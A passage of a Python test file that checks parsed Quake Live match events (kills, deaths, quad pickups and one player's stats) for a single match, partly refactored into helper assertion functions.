assert e[55]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[55]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[55]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[55]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[55]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[55]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[55]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[55]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[55]['DATA']['ROUND'] is None # noqa
assert e[55]['DATA']['SUICIDE'] is None # noqa
assert e[55]['DATA']['TEAMKILL'] is None # noqa
assert e[55]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[55]['DATA']['TEAM_DEAD'] is None # noqa
assert e[55]['DATA']['TIME'] == 202.1 # noqa
assert e[55]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[55]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[55]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[55]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[55]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[55]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[55]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[55]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[55]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[55]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[55]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[55]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[55]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[55]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[55]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[55]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[55]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[55]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[55]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[55]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[55]['DATA']['WARMUP'] == False # noqa
assert e[55]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[56]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[56]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[56]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[56]['DATA']['KILLER']['BOT'] is None # noqa
assert e[56]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[56]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[56]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[56]['DATA']['KILLER']['NAME'] is None # noqa
assert e[56]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[56]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[56]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[56]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[56]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[56]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[56]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[56]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[56]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[56]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[56]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[56]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[56]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[56]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[56]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[56]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[56]['DATA']['ROUND'] is None # noqa
assert e[56]['DATA']['SUICIDE'] is None # noqa
assert e[56]['DATA']['TEAMKILL'] is None # noqa
assert e[56]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[56]['DATA']['TEAM_DEAD'] is None # noqa
assert e[56]['DATA']['TIME'] == 202.1 # noqa
assert e[56]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[56]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[56]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[56]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[56]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[56]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[56]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[56]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[56]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[56]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[56]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[56]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[56]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[56]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[56]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[56]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[56]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[56]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[56]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[56]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[56]['DATA']['WARMUP'] == False # noqa
assert e[56]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[57]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[57]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[57]['DATA']['TIME'] == 208.2 # noqa
assert e[57]['DATA']['WARMUP'] == False # noqa
assert e[57]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[58]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[58]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[58]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[58]['DATA']['KILLER']['BOT'] is None # noqa
assert e[58]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[58]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[58]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[58]['DATA']['KILLER']['NAME'] is None # noqa
assert e[58]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[58]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[58]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[58]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[58]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[58]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[58]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[58]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[58]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[58]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[58]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[58]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[58]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[58]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[58]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[58]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[58]['DATA']['ROUND'] is None # noqa
assert e[58]['DATA']['SUICIDE'] is None # noqa
assert e[58]['DATA']['TEAMKILL'] is None # noqa
assert e[58]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[58]['DATA']['TEAM_DEAD'] is None # noqa
assert e[58]['DATA']['TIME'] == 209.2 # noqa
assert e[58]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[58]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[58]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[58]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[58]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[58]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[58]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[58]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[58]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[58]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[58]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[58]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[58]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[58]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[58]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[58]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[58]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[58]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[58]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[58]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[58]['DATA']['WARMUP'] == False # noqa
assert e[58]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[59]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[59]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[59]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[59]['DATA']['KILLER']['BOT'] is None # noqa
assert e[59]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[59]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[59]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[59]['DATA']['KILLER']['NAME'] is None # noqa
assert e[59]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[59]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[59]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[59]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[59]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[59]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[59]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[59]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[59]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[59]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[59]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[59]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[59]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[59]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[59]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[59]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[59]['DATA']['ROUND'] is None # noqa
assert e[59]['DATA']['SUICIDE'] is None # noqa
assert e[59]['DATA']['TEAMKILL'] is None # noqa
assert e[59]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[59]['DATA']['TEAM_DEAD'] is None # noqa
assert e[59]['DATA']['TIME'] == 209.2 # noqa
assert e[59]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[59]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[59]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[59]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[59]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[59]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[59]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[59]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[59]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[59]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[59]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[59]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[59]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[59]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[59]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[59]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[59]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[59]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[59]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[59]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[59]['DATA']['WARMUP'] == False # noqa
assert e[59]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[60]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[60]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[60]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[60]['DATA']['KILLER']['BOT'] is None # noqa
assert e[60]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[60]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[60]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[60]['DATA']['KILLER']['NAME'] is None # noqa
assert e[60]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[60]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[60]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[60]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[60]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[60]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[60]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[60]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[60]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[60]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[60]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[60]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[60]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[60]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[60]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[60]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[60]['DATA']['ROUND'] is None # noqa
assert e[60]['DATA']['SUICIDE'] is None # noqa
assert e[60]['DATA']['TEAMKILL'] is None # noqa
assert e[60]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[60]['DATA']['TEAM_DEAD'] is None # noqa
assert e[60]['DATA']['TIME'] == 220.8 # noqa
assert e[60]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[60]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[60]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[60]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[60]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[60]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[60]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[60]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[60]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[60]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[60]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[60]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[60]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[60]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[60]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[60]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[60]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[60]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[60]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[60]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[60]['DATA']['WARMUP'] == False # noqa
assert e[60]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[61]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[61]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[61]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[61]['DATA']['KILLER']['BOT'] is None # noqa
assert e[61]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[61]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[61]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[61]['DATA']['KILLER']['NAME'] is None # noqa
assert e[61]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[61]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[61]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[61]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[61]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[61]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[61]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[61]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[61]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[61]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[61]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[61]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[61]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[61]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[61]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[61]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[61]['DATA']['ROUND'] is None # noqa
assert e[61]['DATA']['SUICIDE'] is None # noqa
assert e[61]['DATA']['TEAMKILL'] is None # noqa
assert e[61]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[61]['DATA']['TEAM_DEAD'] is None # noqa
assert e[61]['DATA']['TIME'] == 220.8 # noqa
assert e[61]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[61]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[61]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[61]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[61]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[61]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[61]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[61]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[61]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[61]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[61]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[61]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[61]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[61]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[61]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[61]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[61]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[61]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[61]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[61]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[61]['DATA']['WARMUP'] == False # noqa
assert e[61]['TYPE'] == 'PLAYER_DEATH' # noqa
# Events e[62]..e[73]: two PLAYER_QUAD pickups and five PLAYER_KILL /
# PLAYER_DEATH pairs.  The original generated code repeated ~55
# identical-shape assertions per frag event; they are folded into two
# helpers that assert exactly the same conditions on the same fields.

# Match GUID shared by every event in this group (copied from the
# generated assertions it replaces).
_MATCH_GUID_19B5 = '19b5bc9bf2e789eab15613dd3ee3e97b'


def _assert_quad_event(ev, steam_id, time):
    """Assert *ev* is a non-warmup PLAYER_QUAD event for *steam_id* at *time*."""
    assert ev['TYPE'] == 'PLAYER_QUAD'
    data = ev['DATA']
    assert data['MATCH_GUID'] == _MATCH_GUID_19B5
    assert data['STEAM_ID'] == steam_id
    assert data['TIME'] == time
    # `== False` kept (not `is False`) to match the generated originals
    # byte-for-byte in behavior, in case the parser ever yields 0.
    assert data['WARMUP'] == False  # noqa


def _assert_frag_event(ev, type_, killer_id, victim_id, mod, time):
    """Assert *ev* is a non-warmup PLAYER_KILL/PLAYER_DEATH event.

    Checks MOD, TIME and both players' STEAM_IDs; every extended
    round/player field (ammo, armor, position, view, ...) is expected
    to be unset (None), exactly as in the generated assertions.
    """
    assert ev['TYPE'] == type_
    data = ev['DATA']
    assert data['MATCH_GUID'] == _MATCH_GUID_19B5
    assert data['MOD'] == mod
    assert data['TIME'] == time
    assert data['WARMUP'] == False  # noqa
    # Round-level optional fields: all unset for these events.
    for field in ('OTHER_TEAM_ALIVE', 'OTHER_TEAM_DEAD', 'ROUND', 'SUICIDE',
                  'TEAMKILL', 'TEAM_ALIVE', 'TEAM_DEAD'):
        assert data[field] is None
    # Killer and victim share the same (empty) extended-state shape.
    for role, steam_id in (('KILLER', killer_id), ('VICTIM', victim_id)):
        player = data[role]
        assert player['STEAM_ID'] == steam_id
        for field in ('AIRBORNE', 'AMMO', 'ARMOR', 'BOT', 'BOT_SKILL',
                      'HEALTH', 'HOLDABLE', 'NAME', 'POWERUPS', 'SPEED',
                      'SUBMERGED', 'TEAM', 'WEAPON'):
            assert player[field] is None
        for axis in ('X', 'Y', 'Z'):
            assert player['POSITION'][axis] is None
            assert player['VIEW'][axis] is None


# Steam ids seen in this group ('Bartoszer' name taken from the e[74]
# stats assertions for the same id).
_BARTOSZER = '6179638dba55b8f5d2da7838'
_OPPONENT = '7727c59e2bf61c4a67428d15'
_THIRD = '254e24151c9e5466251073e6'

_assert_quad_event(e[62], _OPPONENT, 225.8)
# Each kill is mirrored by a PLAYER_DEATH event with identical data.
_assert_frag_event(e[63], 'PLAYER_KILL', _BARTOSZER, _OPPONENT, 'GAUNTLET', 230.0)
_assert_frag_event(e[64], 'PLAYER_DEATH', _BARTOSZER, _OPPONENT, 'GAUNTLET', 230.0)
_assert_quad_event(e[65], _BARTOSZER, 230.0)
_assert_frag_event(e[66], 'PLAYER_KILL', _OPPONENT, _THIRD, 'ROCKET', 246.3)
_assert_frag_event(e[67], 'PLAYER_DEATH', _OPPONENT, _THIRD, 'ROCKET', 246.3)
# e[68]/e[69]: killer and victim are the same player (self-inflicted
# plasma splash), though SUICIDE itself is unset in the event data.
_assert_frag_event(e[68], 'PLAYER_KILL', _BARTOSZER, _BARTOSZER, 'PLASMA_SPLASH', 260.0)
_assert_frag_event(e[69], 'PLAYER_DEATH', _BARTOSZER, _BARTOSZER, 'PLASMA_SPLASH', 260.0)
_assert_frag_event(e[70], 'PLAYER_KILL', _BARTOSZER, _THIRD, 'LIGHTNING', 300.4)
_assert_frag_event(e[71], 'PLAYER_DEATH', _BARTOSZER, _THIRD, 'LIGHTNING', 300.4)
_assert_frag_event(e[72], 'PLAYER_KILL', _BARTOSZER, _THIRD, 'ROCKET', 313.0)
_assert_frag_event(e[73], 'PLAYER_DEATH', _BARTOSZER, _THIRD, 'ROCKET', 313.0)
# e[74]: per-player match-stats payload for 'Bartoszer' — presumably a
# PLAYER_STATS event; its TYPE assertion lies beyond this chunk, so
# confirm there.  Only damage, armor/health totals and per-weapon
# hit/shot counters are non-zero.
assert e[74]['DATA']['ABORTED'] == False # noqa
assert e[74]['DATA']['BLUE_FLAG_PICKUPS'] == 0 # noqa
assert e[74]['DATA']['DAMAGE']['DEALT'] == 3185 # noqa
assert e[74]['DATA']['DAMAGE']['TAKEN'] == 1081 # noqa
assert e[74]['DATA']['DEATHS'] == 0 # noqa
assert e[74]['DATA']['HOLY_SHITS'] == 0 # noqa
assert e[74]['DATA']['KILLS'] == 0 # noqa
assert e[74]['DATA']['LOSE'] == 0 # noqa
assert e[74]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[74]['DATA']['MAX_STREAK'] == 0 # noqa
# Medal counters: all zero for this player in this match.
assert e[74]['DATA']['MEDALS']['ACCURACY'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['ASSISTS'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['CAPTURES'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['COMBOKILL'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['DEFENDS'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['EXCELLENT'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['FIRSTFRAG'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['HEADSHOT'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['HUMILIATION'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['IMPRESSIVE'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['MIDAIR'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['PERFECT'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['PERFORATED'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['QUADGOD'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['RAMPAGE'] == 0 # noqa
assert e[74]['DATA']['MEDALS']['REVENGE'] == 0 # noqa
assert e[74]['DATA']['MODEL'] is None # noqa
assert e[74]['DATA']['NAME'] == 'Bartoszer' # noqa
assert e[74]['DATA']['NEUTRAL_FLAG_PICKUPS'] == 0 # noqa
# Item pickup counters: per-item counts are zero, only the TOTAL_*
# aggregates are populated.
assert e[74]['DATA']['PICKUPS']['AMMO'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['ARMOR'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['ARMOR_REGEN'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['BATTLESUIT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['DOUBLER'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['FLIGHT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['GREEN_ARMOR'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['GUARD'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['HASTE'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['HEALTH'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['INVIS'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['INVULNERABILITY'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['KAMIKAZE'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['MEDKIT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['MEGA_HEALTH'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['OTHER_HOLDABLE'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['OTHER_POWERUP'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['PORTAL'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['QUAD'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['RED_ARMOR'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['REGEN'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['SCOUT'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['TELEPORTER'] == 0 # noqa
assert e[74]['DATA']['PICKUPS']['TOTAL_ARMOR'] == 550 # noqa
assert e[74]['DATA']['PICKUPS']['TOTAL_HEALTH'] == 100 # noqa
assert e[74]['DATA']['PICKUPS']['YELLOW_ARMOR'] == 0 # noqa
assert e[74]['DATA']['PLAY_TIME'] == 0 # noqa
assert e[74]['DATA']['QUIT'] is None # noqa
assert e[74]['DATA']['RANK'] == 0 # noqa
assert e[74]['DATA']['RED_FLAG_PICKUPS'] == 0 # noqa
assert e[74]['DATA']['SCORE'] == 0 # noqa
assert e[74]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[74]['DATA']['TEAM'] is None # noqa
assert e[74]['DATA']['TEAM_JOIN_TIME'] == 0 # noqa
assert e[74]['DATA']['TEAM_RANK'] is None # noqa
assert e[74]['DATA']['TIED_RANK'] is None # noqa
assert e[74]['DATA']['TIED_TEAM_RANK'] is None # noqa
assert e[74]['DATA']['TIME'] == 315.2 # noqa
assert e[74]['DATA']['WARMUP'] == False # noqa
# Per-weapon stats: only the H and S sub-keys carry values here
# (presumably hits and shots — inferred from key names; verify against
# the parser).  The group continues past this chunk.
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['H'] == 8 # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['GAUNTLET']['S'] == 0 # noqa
